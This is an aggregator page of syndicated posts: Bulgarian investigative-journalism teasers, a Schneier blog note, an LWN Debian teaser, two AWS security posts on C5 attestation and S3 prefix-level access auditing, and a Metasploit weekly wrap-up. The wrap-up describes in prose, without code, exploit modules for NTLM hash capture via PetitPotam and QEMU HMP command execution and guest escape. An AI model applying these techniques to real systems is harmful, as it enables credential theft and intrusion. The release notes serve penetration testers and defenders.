Кочината ке падне!

Post Syndicated from original https://bivol.bg/%D0%BA%D0%BE%D1%87%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-%D0%BA%D0%B5-%D0%BF%D0%B0%D0%B4%D0%BD%D0%B5.html

понеделник 14 февруари 2022


Системата си работеше като добре смазана машина дълго време. Толкова дълго време, че се беше превърнало в безвремие. Всички виждахме, че нещата не са наред, някои от нас дори имаха…

Разследване на OCCRP с участие на “Биволъ” #OpenLux: Вила за €25 млн. за синове на руски олигарх, лишен от златен паспорт у нас

Post Syndicated from Екип на Биволъ original https://bivol.bg/openlux-%D0%B2%D0%B8%D0%BB%D0%B0-%D0%B7%D0%B0-e25-%D0%BC%D0%BB%D0%BD-%D0%B7%D0%B0-%D1%81%D0%B8%D0%BD%D0%BE%D0%B2%D0%B5-%D0%BD%D0%B0-%D1%80%D1%83%D1%81%D0%BA%D0%B8-%D0%BE%D0%BB%D0%B8%D0%B3%D0%B0.html

неделя 13 февруари 2022


Докато в Народното събрание на Република България опозицията и управляващите търсят виновните за мащабните афери със златните паспорти у нас, сайтът за разследваща журналистика “Биволъ”. продължава действа. След като през…

Friday Squid Blogging: Climate Change Causing “Squid Bloom” along Pacific Coast

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/02/friday-squid-blogging-climate-change-causing-squid-bloom-along-pacific-coast.html

The oceans are warmer, which means more squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/02/11/metasploit-wrap-up-148/

Welcome, Little Hippo: PetitPotam

Metasploit Wrap-Up

Our very own @zeroSteiner ported the PetitPotam exploit to Metasploit this week. This module leverages CVE-2021-36942, a vulnerability in the Windows Encrypting File System (EFS) API, to capture machine NTLM hashes. This uses the EfsRpcOpenFileRaw function of the Microsoft’s Encrypting File System Remote Protocol API (MS-EFSRPC) to coerce machine authentication to a user-controlled listener host. Metasploit’s SMB capture server module can be used for this. The captured hashes are typically used as part of a NTLM relaying attack to take over other Windows hosts. Note that Microsoft has published some guidance about how to mitigate NTLM relay attacks.

QEMU Human Monitor Interface RCE

Contributor @bcoles added an exploit module that abuse QEMU’s Monitor Human Monitor Interface (HMP) TCP server to execute arbitrary commands by using the migrate HMP command. Furthermore, since the HMP TCP service is reachable from emulated devices, it is possible to escape QEMU from a guest system using this module. Note that it doesn’t work on Windows hosts since the migrate command cannot spawn processes on this platform.

New module content (2)

  • PetitPotam by GILLES Lionel and Spencer McIntyre, which exploits CVE-2021-36942 – This adds a new auxiliary scanner module that ports the PetitPotam tool to Metasploit andleverages CVE-2021-36942 to coerce Windows hosts to authenticate to a user-specific host, which enables an attacker to capture NTLM credentials for further actions, such as relay attacks.
  • QEMU Monitor HMP ‘migrate’ Command Execution by bcoles – This adds a module that can exploit the QEMU HMP service to execute OS commands. The HMP TCP service is reachable from emulated devices, so it is possible to escape QEMU by exploiting this vulnerability.

Enhancements and features

  • #16010 from lap1nou – This updates the zabbix_script_exec module with support for Zabbix version 5.0 and later. It also adds a new item-based execution technique and support for delivering Linux native payloads.
  • #16163 from zeroSteiner – Support has been added for the ClaimsPrincipal .NET deserialization gadget chain, which was found by jang. An exploit which utilizes this enhancement will arrive shortly.
  • #16125 from bcoles – This module can exploit GXV3140 models now that an ARCH_CMD target has been added.

Bugs fixed

  • #16121 from timwr – This fixes an exception caused by exploits that call rhost() in Msf::Post::Common without a valid session.
  • #16142 from timwr – This fixes an issue with Meterpreter’s getenv command that was not returning NULL when querying for a non-existing environment variable.
  • #16143 from sjanusz-r7 – This fixes an issue where a Cygwin SSH session was not correctly identified being a Windows device, due to a case sensitivity issue
  • #16147 from zeroSteiner – This fixes a bug where ssh_enumusers would only use one source in the generation of its user word list if both USERNAME and USER_FILE options were set. The module now pulls from all possible datastore options if they are set, including a new option DB_ALL_USERS.
  • #16160 from zeroSteiner – This fixes a crash when msfconsole is unable to correctly determine the hostname and current user within a shell prompt.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

C5 Type 2 attestation report now available with 141 services in scope

Post Syndicated from Mercy Kanengoni original https://aws.amazon.com/blogs/security/c5-type-2-attestation-report-now-available-with-141-services-in-scope/

Amazon Web Services (AWS) is pleased to announce the issuance of the new Cloud Computing Compliance Controls Catalogue (C5) Type 2 attestation report. We added 18 additional services and service features to the scope of the 2021 report.

Germany’s national cybersecurity authority, Bundesamt für Sicherheit in der Informationstechnik (BSI), established C5 to define a reference standard for German cloud security requirements. The C5 Type 2 report covers the time period from October 1, 2020, through September 30, 2021. It was issued by an independent third-party attestation organization, and assesses the design and the operational effectiveness of AWS’s controls against the new version C5:2020’s basic and additional criteria.

Customers in Germany and other European countries can use AWS’s attestation report to confirm that AWS meets the security requirements of the C5:2020 framework, and to review the details of the tested controls. This attestation demonstrates our commitment to meet and exceed the security expectations for cloud service providers set by the BSI.

AWS has added the following 18 services and service features to the new C5 scope:

You can see a current list of the services in scope for C5 on the AWS Services in Scope by Compliance Program page.

AWS strives to continuously bring services into scope of its compliance programs to help you meet your architectural and regulatory needs. Please reach out to your AWS account team if you have questions or feedback about the C5 report.

The C5 report and Continuing Operations Letter is available to AWS customers through AWS Artifact. For more information, see Cloud Computing Compliance Controls Catalogue (C5).

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Security Hub forum. To start your 30-day free trial of Security Hub, visit AWS Security Hub.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Mercy Kanengoni

Mercy Kanengoni

Mercy is a Security Audit Program Manager at AWS based in Manchester, UK. She leads security audits across Europe, and she has previously worked in security assurance and technology risk management.

Author

Karthik Amrutesh

Karthik is a Senior Manager, Security Assurance at AWS based in New York, U.S. His team is responsible for audits, attestations, certifications, and assessments globally. Karthik has previously worked in risk management, security assurance, and technology audits for the past 18 years.

[$] Debian reconsiders NEW review

Post Syndicated from original https://lwn.net/Articles/884301/

The Debian project is known for its commitment to free software, the effort
that it puts into ensuring that its distribution is compliant with the
licenses of the software it ships, and the energy it
puts into discussions around that work. A recent (and ongoing) discussion
started with
a query about a relatively obscure aspect of the process by which new
packages enter the distribution, but ended up questioning the project’s
approach toward licensing and copyright issues. While no real conclusions
were reached, it seems likely that the themes heard in this discussion,
which relate to Debian’s role in the free-software community in general, will
play a prominent part in future debates.

[$] Debian reconsiders NEW review

Post Syndicated from original https://lwn.net/Articles/884301/rss

The Debian project is known for its commitment to free software, the effort
that it puts into ensuring that its distribution is compliant with the
licenses of the software it ships, and the energy it
puts into discussions around that work. A recent (and ongoing) discussion
started with
a query about a relatively obscure aspect of the process by which new
packages enter the distribution, but ended up questioning the project’s
approach toward licensing and copyright issues. While no real conclusions
were reached, it seems likely that the themes heard in this discussion,
which relate to Debian’s role in the free-software community in general, will
play a prominent part in future debates.

How to Audit and Report S3 Prefix Level Access Using S3 Access Analyzer

Post Syndicated from Somdeb Bhattacharjee original https://aws.amazon.com/blogs/architecture/how-to-audit-and-report-s3-prefix-level-access-using-s3-access-analyzer/

Data Services teams in all industries are developing centralized data platforms that provide shared access to datasets across multiple business units and teams within the organization. This makes data governance easier, minimizes data redundancy thus reducing cost, and improves data integrity. The central data platform is often built with AWS Simple Storage Service (S3).

A common pattern for providing access to this data is for you to set up cross-account IAM Users and IAM Roles to allow direct access to the datasets stored in S3 buckets. You then enforce the permission on these datasets with S3 Bucket Policies or S3 Access Point policies. These policies can be very granular and you can provide access at the bucket level, prefix level as well as object level within an S3 bucket.

To reduce risk and unintended access, you can use Access Analyzer for S3 to identify S3 buckets within your zone of trust (Account or Organization) that are shared with external identities. Access Analyzer for S3 provides a lot of useful information at the bucket level but you often need S3 audit capability one layer down, at the S3 prefix level, since you are most likely going to organize your data using S3 prefixes.

Common use cases

Many organizations need to ingest a lot of third-party/vendor datasets and then distribute these datasets within the organization in a subscription-based model. Irrespective of how the data is ingested, whether it is using AWS Transfer Family service or other mechanisms, all the ingested datasets are stored in a single S3 bucket with a separate prefix for each vendor dataset. The hierarchy can be represented as:

vendor-s3-bucket
       ->vendorA-prefix
               ->vendorA.dataset.csv
       ->vendorB-prefix
               ->vendorB.dataset.csv

Based on this design, access is also granted to the data subscribers at the S3 prefix level. Access Analyzer for S3 does not provide visibility at the S3 prefix level so you need to develop custom scripts to extract this information from the S3 policy documents. You also need the information in an easy-to-consume format, for example, a csv file, that can be queried, filtered, readily downloaded and shared across the organization.

To help address this requirement, we show how to implement a solution that builds on the S3 access analyzer findings to generate a csv file on a pre-configured frequency. This solution provides details about:

  • External Principals outside your trust zone that have access to your S3 buckets
  • Permissions granted to these external principals (read, write)
  • List of s3 prefixes these external principals have access to that is configured using S3 bucket policy and/or S3 access point policies.

Architecture Overview

Architecture Diagram showing How to Audit and Report S3 prefix level access using S3 Access Analyzer

Figure 1 – How to Audit and Report S3 prefix level access using S3 Access Analyzer

The solution entails the following steps:

Step 1 – The Access Analyzer ARN and the S3 bucket parameters are passed to an AWS Lambda function via Environment variables.

Step 2 – The Lambda code uses the Access Analyzer ARN to call the list-findings API to retrieve the findings information and store it in the S3 bucket (under json prefix) in JSON format.

Step 3 – The Lambda function then also parses the JSON file to get the required fields and store it as a csv file in the same S3 bucket (under report prefix). It also scans the bucket policy and/or the access point policies to retrieve the S3 prefix level permission granted to the external identity. That information is added to the csv file.

Steps 4 and 5 – As part of the initial deployment, an AWS Glue crawler is provided to discover and create the schema of the csv file and store it in the AWS Glue Data Catalog.

Step 6 – An Amazon Athena query is run to create a spreadsheet of the findings that can be downloaded and distributed for audit.

Prerequisites

For this walkthrough, you should have the following prerequisites:

  • An AWS account
  • S3 buckets that are shared with external identities via cross-account IAM roles or IAM users.  Follow these instructions in this user guide to set up cross-account S3 bucket access.
  • IAM Access Analyzer enabled for your AWS account. Follow these instructions to enable IAM Access Analyzer within your account.

Once the IAM Access Analyzer is enabled, you should be able to view the Analyzer findings from the S3 console by selecting the bucket name and clicking on the ‘View findings’ box or directly going to the Access Analyzer findings on the IAM console.

When you select a ‘Finding id’ for an S3 Bucket, a screen similar to the following will appear:

Figure 2 - IAM Console Screenshot

Figure 2 – IAM Console Screenshot

Setup

Now that your access analyzer is running, you can open the link below to deploy the CloudFormation template. Make sure to launch the CloudFormation in the same AWS Region where IAM Access Analyzer has been enabled.

Launch template

Specify a name for the stack and input the following parameters:

  • ARN of the Access Analyzer which you can find from the IAM Console.
  • New S3 bucket where your findings will be stored. The Cloudformation template will add a suffix to the bucket name you provide to ensure uniqueness.
Figure 3 - CloudFormation Template screenshot

Figure 3 – CloudFormation Template screenshot

  • Select Next twice and on the final screen check the box allowing CloudFormation to create the IAM resources before selecting Create Stack.
  • It will take a couple of minutes for the stack to create the resources and launch the AWS Lambda function.
  • Once the stack is in CREATE_COMPLETE status, go to the Outputs tab of the stack and note down the value against the DataS3BucketName key. This is the S3 bucket the template generated. It would be of the format analyzer-findings-xxxxxxxxxxxx. Go to the S3 console and view the contents of the bucket.
    There should be two folders archive/ and report/. In the report folder you should have the csv file containing the findings report.
  • You can download the csv directly and open it in a excel sheet to view the contents. If would like to query the csv based on different attributes, follow the next set of steps.
    Go to the AWS Glue console and click on Crawlers. There should be an analyzer-crawler created for you. Select the crawler to run it.
  • After the crawler runs successfully, you should see a new table, analyzer-report created under analyzerdb Glue database.
  • Select the tablename to view the table properties and schema.
  • To query the table, go to the Athena console and select the analyzerdb database. Then you can run a query like “Select * from analyzer-report where externalaccount = <<valid external account>>” to list all the S3 buckets the external account has access to.
Figure 4 - Amazon Athena Console screenshot

Figure 4 – Amazon Athena Console screenshot

The output of the query with a subset of columns is shown as follows:

Figure 5 - Output of Amazon Athena Query

Figure 5 – Output of Amazon Athena Query

This CloudFormation template also creates a Cloudwatch event rule, testanalyzer-ScheduledRule-xxxxxxx, that launches the Lambda function every Monday to generate a new version of the findings csv file. You can update the rule to set it to a frequency you desire.

Clean Up

To avoid incurring costs, remember to delete the resources you created. First, manually delete the folders ‘archive’ and ‘report’ in the S3 bucket and then delete the CloudFormation stack you deployed at the beginning of the setup.

Conclusion

In this blog, we showed how you can build audit capabilities for external principals accessing your S3 buckets at a prefix level. Organizations looking to provide shared access to datasets across multiple business units will find this solution helpful in improving their security posture. Give this solution a try and share your feedback!

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close